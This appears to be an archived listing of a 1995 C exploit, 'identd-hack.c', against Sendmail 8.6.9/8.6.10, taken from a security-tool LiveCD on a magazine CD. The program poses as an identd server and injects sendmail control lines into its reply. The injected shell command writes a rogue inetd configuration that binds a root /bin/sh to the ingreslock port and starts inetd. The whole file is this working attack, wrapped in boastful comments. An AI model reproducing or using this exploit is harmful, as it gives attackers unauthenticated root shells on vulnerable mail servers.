home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / sendmail / identd-hack.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  54 lines
  1. /* Sendmail 8.6.9 identd hack.  -- SnoCrash [r00t] */
  2. /* 9/29/95 -- Fixed to make it compile on fuxin' SunOS */
  3. /* Fixed some more so it can work on 8.6.10 -- 10/2/95 */
  4. /* Final cleanup -- 10/4/95.                     [2000]*/
  5.  
  6. #include <stdio.h>
  7. #include <sys/types.h>
  8. #include <sys/fcntl.h>
  9. #include <gnu/types.h>
  10. #include <stdlib.h>
  11. #include <string.h>
  12. #include <unistd.h>
  13. #define OUTPUT_BUFFER 4096   /* Output and input, */
  14. #define SOCKET_BUFFER 512    /* with which we must up-put */
  15. void main(void)
  16. {
  17.   struct fd_set fdesc;   /* File descriptor structure */
  18.   char outbuf[OUTPUT_BUFFER];  /* Our output buffer */
  19.   char inbuf[SOCKET_BUFFER];   /* ""  input "" */
  20.   /* Preparing to read incoming data, captain. */
  21.   FD_ZERO(&fdesc);
  22.   FD_SET(0, &fdesc);
  23.  
  24.   /* Read it, Sulu! Now! */
  25.   if(read(0, inbuf, SOCKET_BUFFER - 1)<=0)
  26.     exit(1);
  27.   FD_SET(0, &fdesc);
  28.  
  29.   /* Now we send our instructions, under the guise of innocent
  30.    * ol' identd.  I find this ironic, that identd, supposedly
  31.    * a standard that would help stop "evil hacker types", became
  32.    * part of one of the bigger holes to ever hit the net.  Hmm.
  33.    * Ain't life funny that way sometimes? :)
  34.    */
  35.   sprintf(outbuf, " \
  36.           %s : USERID : UNIX : Evil_Hacker_Type...Phear_Me.  So, like.. here are \
  37.           my evil commands for you to execute so I can rox yer box.  Check this out... \
  38.           \r\nCroot\r\nR<\"|/bin/echo ingreslock stream tcp nowait root /bin/sh /bin/sh > \
  39.           /tmp/.inetd.conf ; /usr/sbin/inetd /tmp/.inetd.conf \">\r\nHReceived: Pretty \
  40.           fucking eleet, eh?  Now I just have to sit here and babble so I can fill \
  41.           up your crappy buffer.  So I bet youre wondering how this got here.  Well \
  42.           lets just say you shouldnt run a Sendmail earlier or later than 8.6.11. \
  43.           8.6.12 has a whole load of different bugs, but this isnt one of them. \
  44.           Im not so sure about 8.7.x, but I wouldnt trust Eric Allman too much. \
  45.           weellll... it's been fun fucking with your box and all, but I really must \
  46.           be going, so I guess Ill see you around.  Tell all your friends to be nice \
  47.           and leave the door open like you did.  Thanks... its been real.   \unkyfunkyfunkyfunkyfunkyfunkyfunkyfunkyfunkyfunkyfunky....aaah this is just too
  48.           funky.\r\n \
  49.           ", inbuf);
  50.  
  51.   write(1, outbuf, strlen(outbuf));
  52.   exit(0);
  53. }
  54. /*                    www.hack.co.za              [2000]*/